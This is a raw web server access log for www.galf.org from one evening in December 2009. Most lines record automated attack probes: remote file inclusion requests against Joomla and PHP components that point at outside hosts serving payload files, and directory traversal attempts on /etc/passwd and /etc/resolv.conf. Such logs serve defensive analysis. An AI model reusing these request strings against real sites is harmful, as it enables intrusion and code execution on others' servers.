195.228.45.47 - - [27/Dec/2009:19:39:26 -0800] "GET /logs/access_091123.log%20%20//?path%5Bdocroot%5D=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:39:26 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:39:46 -0800] "GET /logs/access_090720.log%20%20//?path%5Bdocroot%5D=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.24.131.38 - - [27/Dec/2009:19:41:35 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [27/Dec/2009:19:41:35 -0800] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
190.24.131.38 - - [27/Dec/2009:19:41:35 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
84.19.168.8 - - [27/Dec/2009:19:42:34 -0800] "GET /logs/access_090601.log/http://nic.bupt.edu.cn/media/idx? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:08 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:08 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:08 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:08 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:08 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:08 -0800] "GET /logs/access.log//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:25 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:25 -0800] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:25 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:25 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:25 -0800] "GET /logs/access.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:43:25 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.228.45.47 - - [27/Dec/2009:19:44:00 -0800] "GET /logs/access_090706.log//?path%5Bdocroot%5D=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.24.131.38 - - [27/Dec/2009:19:44:14 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [27/Dec/2009:19:44:14 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
190.24.131.38 - - [27/Dec/2009:19:44:14 -0800] "GET /logs/access_091221.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
213.171.37.206 - - [27/Dec/2009:19:46:58 -0800] "GET /logs/access.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [27/Dec/2009:19:46:58 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [27/Dec/2009:19:47:03 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
203.115.131.17 - - [27/Dec/2009:19:48:30 -0800] "GET /logs/access_090921.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:48:30 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:48:30 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:48:34 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:48:34 -0800] "GET /logs/access_090921.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.115.131.17 - - [27/Dec/2009:19:48:35 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hyonsvc.co.kr//bbs//upload/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
213.171.37.206 - - [27/Dec/2009:19:49:03 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [27/Dec/2009:19:49:03 -0800] "GET /logs/access_091221.log/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
213.171.37.206 - - [27/Dec/2009:19:49:03 -0800] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://militarytattoo.lu/adminv3/files/id.txt???%0D?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
203.237.238.234 - - [27/Dec/2009:19:49:27 -0800] "GET /logs/access_090706.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [27/Dec/2009:19:49:27 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [27/Dec/2009:19:49:27 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [27/Dec/2009:19:49:43 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [27/Dec/2009:19:49:43 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [27/Dec/2009:19:49:43 -0800] "GET /logs/access.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
195.228.45.47 - - [27/Dec/2009:19:53:01 -0800] "GET /logs/access_090706.log//?path%5Bdocroot%5D=http://lifezi.com/member/one.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:53:07 -0800] "GET /logs/access_091123.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:53:07 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:53:07 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:53:07 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:53:07 -0800] "GET /logs/access_091123.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:53:07 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:53:07 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:53:07 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:53:49 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:53:50 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:54:02 -0800] "GET /logs/access_090713.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:54:03 -0800] "GET /logs/access_090713.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:54:21 -0800] "GET /logs/access_090817.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:54:21 -0800] "GET /logs/access_090817.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:54:37 -0800] "GET /logs/access_090706.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:54:38 -0800] "GET /logs/access_090706.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:19:54:55 -0800] "GET /logs///appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:19:54:55 -0800] "GET //appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
125.160.17.200 - - [27/Dec/2009:19:54:55 -0800] "GET /logs/access_090928.log%20%20///appserv/main.php?appserv_root=http://cimpli.mwzaf.com/upload/files/16/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:55:06 -0800] "GET /logs/access_090615.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:55:06 -0800] "GET /logs/access_090615.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:55:08 -0800] "GET /logs/access_090824.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:55:09 -0800] "GET /logs/access_090824.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:55:33 -0800] "GET /logs/access_090622.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:55:34 -0800] "GET /logs/access_090622.log//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:56:51 -0800] "GET /logs/access_090817.log%20//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:56:51 -0800] "GET /logs/access_090817.log%20//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:56:54 -0800] "GET /logs/access_090824.log%20//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
208.76.107.242 - - [27/Dec/2009:19:56:54 -0800] "GET /logs/access_090824.log%20//components/com_facileforms/facileforms.frame.php?ff_compath=./../../../../../../../../../../../../../../../../etc/resolv.conf HTTP/1.1" 404 - "-" "-" "www.galf.org"
201.17.147.44 - - [27/Dec/2009:19:57:21 -0800] "GET /index.php?pagina=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:57:27 -0800] "GET /logs/access_090706.log//?path%5Bdocroot%5D=http://www.o-ta.com.tw/images/skt.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.17.147.44 - - [27/Dec/2009:19:57:29 -0800] "GET /index.php?pagina=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "www.galf.org"
195.228.45.47 - - [27/Dec/2009:19:58:59 -0800] "GET /logs/access_090706.log//?path%5Bdocroot%5D=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.145 - - [27/Dec/2009:20:00:19 -0800] "GET /logs/access_090706.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kazakhcrafts.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [27/Dec/2009:20:01:01 -0800] "GET /logs/access_090831.log HTTP/1.0" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
203.34.37.16 - - [27/Dec/2009:20:01:07 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://203.34.37.16/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "galf.org"
203.34.37.16 - - [27/Dec/2009:20:07:41 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&http://203.34.37.16/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
80.67.28.145 - - [27/Dec/2009:20:08:22 -0800] "GET /logs/access_090817.log/errors.php?error=http://www.kazakhcrafts.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.145 - - [27/Dec/2009:20:08:22 -0800] "GET /logs/errors.php?error=http://www.kazakhcrafts.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
80.67.28.145 - - [27/Dec/2009:20:08:22 -0800] "GET /errors.php?error=http://www.kazakhcrafts.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.185 - - [27/Dec/2009:20:09:56 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
203.34.37.16 - - [27/Dec/2009:20:10:40 -0800] "GET /modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://203.34.37.16/glup.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
65.55.106.185 - - [27/Dec/2009:20:11:16 -0800] "GET /logs/ HTTP/1.0" 200 4926 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
80.67.28.145 - - [27/Dec/2009:20:13:14 -0800] "GET /logs/access_091130.log/errors.php?error=http://www.kazakhcrafts.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.22.32 - - [27/Dec/2009:20:21:29 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.22.32 - - [27/Dec/2009:20:21:31 -0800] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [27/Dec/2009:20:23:07 -0800] "GET /?sourcedir=http://lifezi.com/member/one.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
119.235.22.32 - - [27/Dec/2009:20:23:26 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.22.32 - - [27/Dec/2009:20:23:26 -0800] "GET /logs/access_090706.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
119.235.22.32 - - [27/Dec/2009:20:23:26 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://cemerlangclean.com/byz9991.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [27/Dec/2009:20:23:49 -0800] "GET /logs/?sourcedir=http://lifezi.com/member/one.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [27/Dec/2009:20:23:49 -0800] "GET /logs/access_090921.log/?sourcedir=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.47.237.17 - - [27/Dec/2009:20:23:49 -0800] "GET /logs/access_090907.log/?sourcedir=http://lifezi.com/member/one.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:40 -0800] "GET / HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:41 -0800] "GET /?D=A HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:41 -0800] "GET /?M=A HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:42 -0800] "GET /?N=D HTTP/1.1" 200 1048 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:43 -0800] "GET /?S=A HTTP/1.0" 200 1032 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:45 -0800] "GET /cendoc HTTP/1.1" 301 90 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:45 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:46 -0800] "GET /labia HTTP/1.1" 301 89 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:46 -0800] "GET /labia/ HTTP/1.1" 200 524 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:46 -0800] "GET /logs HTTP/1.1" 301 88 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:46 -0800] "GET /logs/ HTTP/1.1" 200 4942 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:48 -0800] "GET /tmp HTTP/1.1" 301 87 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:49 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:50 -0800] "GET /logs/access.log HTTP/1.1" 200 96974 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:52 -0800] "GET /logs/access_090615.log HTTP/1.1" 200 983040 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:53 -0800] "GET /logs/access_090622.log HTTP/1.1" 200 983040 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:55 -0800] "GET /logs/access_090629.log HTTP/1.1" 200 1114112 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:24:57 -0800] "GET /logs/access_090706.log HTTP/1.1" 200 1114112 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:00 -0800] "GET /logs/access_090713.log HTTP/1.1" 200 983040 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:03 -0800] "GET /logs/access_090720.log HTTP/1.1" 200 1114112 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:05 -0800] "GET /logs/access_090727.log HTTP/1.1" 200 1114112 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:07 -0800] "GET /logs/access_090803.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:07 -0800] "GET /logs/access_090810.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:09 -0800] "GET /logs/access_090817.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:11 -0800] "GET /logs/access_090824.log HTTP/1.1" 200 1114112 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:13 -0800] "GET /logs/access_090831.log HTTP/1.1" 200 524288 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:15 -0800] "GET /logs/access_090907.log HTTP/1.1" 200 524288 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:19 -0800] "GET /logs/access_090914.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:22 -0800] "GET /logs/access_090921.log HTTP/1.1" 200 1048576 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:23 -0800] "GET /logs/access_090928.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:25 -0800] "GET /logs/access_091005.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:27 -0800] "GET /logs/access_091012.log HTTP/1.1" 200 917504 "-" "Java/1.6.0_17" "www.galf.org"
64.79.72.114 - - [27/Dec/2009:20:25:37 -0800] "GET /logs/access_091019.log HTTP/1.1" 200 1114112 "-" "Java/1.6.0_17" "www.galf.org"
